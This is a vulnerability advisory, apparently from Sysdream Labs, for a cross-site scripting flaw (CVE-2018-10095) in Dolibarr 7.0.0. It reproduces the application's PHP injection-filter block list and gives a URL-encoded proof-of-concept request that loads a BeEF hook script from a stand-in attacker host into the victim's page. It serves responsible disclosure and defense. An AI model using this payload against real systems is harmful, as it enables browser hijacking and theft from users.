Dolibarr 7.0.0 Cross Site Scripting

Dolibarr version 7.0.0 suffers from a cross site scripting vulnerability.


MD5 | f1bd233c0fbb694e7d33c866d8b44e05

# [CVE-2018-10095] Dolibarr XSS Injection vulnerability


## Description

Dolibarr is an "Open Source ERP & CRM for Business" used by many
companies worldwide.

It is available through [GitHub](https://github.com/Dolibarr/dolibarr)
or as distribution packages (e.g .deb package).

**Threat**

The application does not handle user input properly, allowing
client-side JavaScript code injection (XSS).

**Expectation**

User input should be filtered to avoid arbitrary HTML injection.


## Vulnerability type

**CVE ID**: CVE-2018-10095

**Access Vector**: remote

**Security Risk**: high

**Vulnerability**: CWE-79

**CVSS Base Score**: 7.4

**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N


## Details

Checks are enforced on user input via the `test_sql_and_script_inject()`
function, which forbids some SQL keywords (e.g `union`, `create`,
`insert`) and some XSS-related strings (`onfocus`, for instance).

```php
main.inc.php

/**
* Security: SQL Injection and XSS Injection (scripts) protection
(Filters on GET, POST, PHP_SELF).
*
* @param string $val Value
* @param string $type 1=GET, 0=POST, 2=PHP_SELF
* @return int >0 if there is an injection
*/
function test_sql_and_script_inject($val, $type)
{
$inj = 0;
// For SQL Injection (only GET are used to be included into bad
escaped SQL requests)
if ($type == 1)
{
$inj += preg_match('/updatexml\(/i', $val);
$inj += preg_match('/delete\s+from/i', $val);
$inj += preg_match('/create\s+table/i', $val);
$inj += preg_match('/insert\s+into/i', $val);
$inj += preg_match('/select\s+from/i', $val);
$inj += preg_match('/into\s+(outfile|dumpfile)/i', $val);
}
if ($type != 2) // Not common, we can check on POST
{
$inj += preg_match('/update.+set.+=/i', $val);
$inj += preg_match('/union.+select/i', $val);
$inj += preg_match('/(\.\.%2f)+/i', $val);
}
// For XSS Injection done by adding javascript with script
// This is all cases a browser consider text is javascript:
// When it found '<script', 'javascript:', '<style', 'onload\s=' on
body tag, '="&' on a tag size with old browsers
// All examples on page: http://ha.ckers.org/xss.html#XSScalc
// More on
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
$inj += preg_match('/<script/i', $val);
$inj += preg_match('/<iframe/i', $val);
$inj += preg_match('/Set\.constructor/i', $val); // ECMA script 6
if (! defined('NOSTYLECHECK')) $inj += preg_match('/<style/i', $val);
$inj += preg_match('/base[\s]+href/si', $val);
$inj += preg_match('/<.*onmouse/si', $val); // onmousexxx can
be set on img or any html tag like <img title='...' onmouseover=alert(1)>
$inj += preg_match('/onerror\s*=/i', $val); // onerror can be
set on img or any html tag like <img title='...' onerror = alert(1)>
$inj += preg_match('/onfocus\s*=/i', $val); // onfocus can be
set on input text html tag like <input type='text' value='...' onfocus =
alert(1)>
$inj += preg_match('/onload\s*=/i', $val); // onload can be
set on svg tag <svg/onload=alert(1)> or other tag like body <body
onload=alert(1)>
$inj += preg_match('/onclick\s*=/i', $val); // onclick can be
set on img text html tag like <img onclick = alert(1)>
$inj += preg_match('/onscroll\s*=/i', $val); // onscroll can be
on textarea
//$inj += preg_match('/on[A-Z][a-z]+\*=/', $val); // To lock event
handlers onAbort(), ...
$inj += preg_match('/:|&#0000058|&#x3A/i', $val); //
refused string ':' encoded (no reason to have it encoded) to lock
'javascript:...'
//if ($type == 1)
//{
$inj += preg_match('/javascript:/i', $val);
$inj += preg_match('/vbscript:/i', $val);
//}
// For XSS Injection done by adding javascript closing html tags
like with onmousemove, etc... (closing a src or href tag with not
cleaned param)
if ($type == 1) $inj += preg_match('/"/i', $val); // We
refused " in GET parameters value
if ($type == 2) $inj += preg_match('/[;"]/', $val); // PHP_SELF
is a file system path. It can contains spaces.
return $inj;
}
```


## Proof of Concept : injecting a Beef agent into the victim's browser

**Exploit link**

```
http://dolibarr.lab:2080//dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%22%3e%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%61%74%74%61%63%6b%2e%6c%61%62%2f%62%65%65%66%2f%68%6f%6f%6b%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e&model=5160&optioncss=print
```

**HTTP Request**

```http
GET
/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%22%3e%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%61%74%74%61%63%6b%2e%6c%61%62%2f%62%65%65%66%2f%68%6f%6f%6b%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e&model=5160&optioncss=print
HTTP/1.1
Host: dolibarr.lab:2080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;
x64; Trident/5.0)
Connection: close
Referer: http://dolibarr.lab:2080/dolibarr/adherents/cartes/carte.php
Cookie:
DOLSESSID_cac4a1e49e4040e845340fe919bd202b=8833dl7see43ifl6l9667huvt5


...

t><br>Login: <input size="10" type="text" name="foruserlogin"
value=""><script
src="https://attack.lab/beef/hook.js"></script>"><br><input
class="button" type="submit" value="Build Doc"></form><br><img src="/dolibar
```


## Affected versions

* Version 7.0.0 (last stable version as of March 2018) - previous
versions are probably also vulnerable but not tested


## Solution

Update to 7.0.2
([changelog](https://raw.githubusercontent.com/Dolibarr/dolibarr/develop/ChangeLog))

## Timeline (dd/mm/yyyy)

* 18/03/2018 : Initial discovery
* 17/04/2018 : Contact with the editor
* 17/04/2018 : Editor acknowledges the vulnerability
* 18/04/2018 : Editor announces fixes in version 7.0.2
* 21/05/2018 : Vulnerability disclosure

## Credits

* Issam RABHI (i dot rabhi at sysdream.com)
* Kevin LOCATI (k dot locati at sysdream dot com)

--
SYSDREAM Labs <[email protected]>

GPG :
47D1 E124 C43E F992 2A2E
1551 8EB4 8CD9 D5B2 59A1

* Website: https://sysdream.com/
* Twitter: @sysdream


Related Posts